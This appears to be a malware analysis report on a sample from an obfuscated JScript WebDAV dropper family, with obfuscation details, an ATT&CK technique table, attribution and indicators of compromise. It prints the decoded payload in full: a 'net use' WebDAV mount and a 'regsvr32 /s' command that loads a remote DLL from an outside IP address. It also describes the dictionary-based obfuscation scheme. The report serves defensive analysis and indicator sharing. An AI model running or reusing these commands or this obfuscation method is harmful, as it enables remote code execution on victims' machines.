26666aa20903faa5a1c72b35c4207121fd3e924ad8eecb5d25dbd4cd3b3b869426666aa2 — Unclassified JS WebDAV Dropper (104th Sibling)
Build / RE
Language: JScript (Windows Script Host), single-line flattened ASCII text, 1.2 MB, no line terminators. ^[file.txt]
Obfuscation dialect: JScript dictionary lookup-table with extreme variable-name padding — 62 key/value pairs mapping random noise keys (8–20 chars) to single ASCII characters (A–Z, a–z, 0–9), stored as properties of a single object variable with a 597-character noise-string name (irrupownist...stuffsuperstare). ^[floss.txt] ^[strings.txt:1]
Assembly engine: The 597-char variable name is declared as =[];, then 62 assignments populate it (var['noise_key']='X';). Two Function(''+var['key']+...) constructors decode strings via concatenation:
- First block (10 keys) →
"returnthis"— used to buildFunction('return this')()for global object access. ^[floss.txt:89] - Second block (336 keys) → full PowerShell command:
WScript.CreateObject("WScript.Shell").Run("powershell -EncodedCommand ..."). ^[floss.txt:112]
Decoded payload (base64 → UTF-16LE): net use \\94.159.113.79@8888\davwwwroot\;regsvr32 /s \\94.159.113.79@8888\davwwwroot\254952309424271.dll ^[floss.txt:145]
Anti-analysis: None. No debugger checks, VM detection, time gates, sandbox gates, or nested try/catch decoys. ^[capa.txt]
Code quality: Low — hand-written, repetitive, verbose. No commercial obfuscator signatures. The 597-char variable name and 1.2 MB file size are pure padding; functional payload is ~300 bytes of decoded JavaScript.
Deploy / ATT&CK
| Tactic | Technique | Evidence |
|---|---|---|
| Execution | T1059.005 (Visual Basic / JScript) | .js file executed by WScript; JScript dictionary assembly ^[floss.txt] |
| Execution | T1059.001 (PowerShell) | PowerShell -EncodedCommand wrapper (base64 UTF-16LE) ^[floss.txt:112] |
| Execution | T1218.010 (Regsvr32) | regsvr32 /s \\94.159.113.79@8888\davwwwroot\254952309424271.dll ^[floss.txt:145] |
| Defense Evasion | T1218 (System Binary Proxy Execution) | wscript.exe → powershell.exe → regsvr32.exe chain ^[floss.txt] |
| Defense Evasion | T1027 (Obfuscated Files or Information) | 62-entry dictionary lookup table with 597-char variable-name padding ^[strings.txt:1] |
| Command & Control | T1071.001 (Web Protocols) | WebDAV over HTTP on \\94.159.113.79@8888\DavWWWRoot\ ^[floss.txt:145] |
| Command & Control | T1105 (Ingress Tool Transfer) | net use mounts WebDAV share; regsvr32 fetches and loads remote DLL ^[floss.txt:145] |
C2 Infrastructure: WebDAV endpoint 94.159.113.79:8888 — fifth confirmed sibling on this IP (after 68th fe261d49, 74th be172014, 79th dc76a67d, and 102nd 9665f822). Payload filename: 254952309424271.dll. No decoy, no timeout gate, no sandbox gate, no batch/polyglot layer.
Attribution: High-confidence sibling of the unclassified-js-webdav-dropper family (n=104). Same 62-entry dictionary cardinality, same Function('return this')() assembly engine, same WebDAV + regsvr32 execution chain, same 94.159.113.x C2 subnet. Structural match to the 62-entry noise-key dictionary dialect observed across 80+ prior siblings.
IOCs
- C2:
94.159.113.79:8888(WebDAV) - Payload:
254952309424271.dll - Execution:
regsvr32 /s \\94.159.113.79@8888\davwwwroot\254952309424271.dll - Staging:
net use \\94.159.113.79@8888\davwwwroot\
Notes
- Static-only analysis; CAPE skipped because sample is ASCII JScript, not a supported binary class. ^[dynamic-analysis.md]
- No orphan wikilinks in this report. All
*...*references point to existing pages.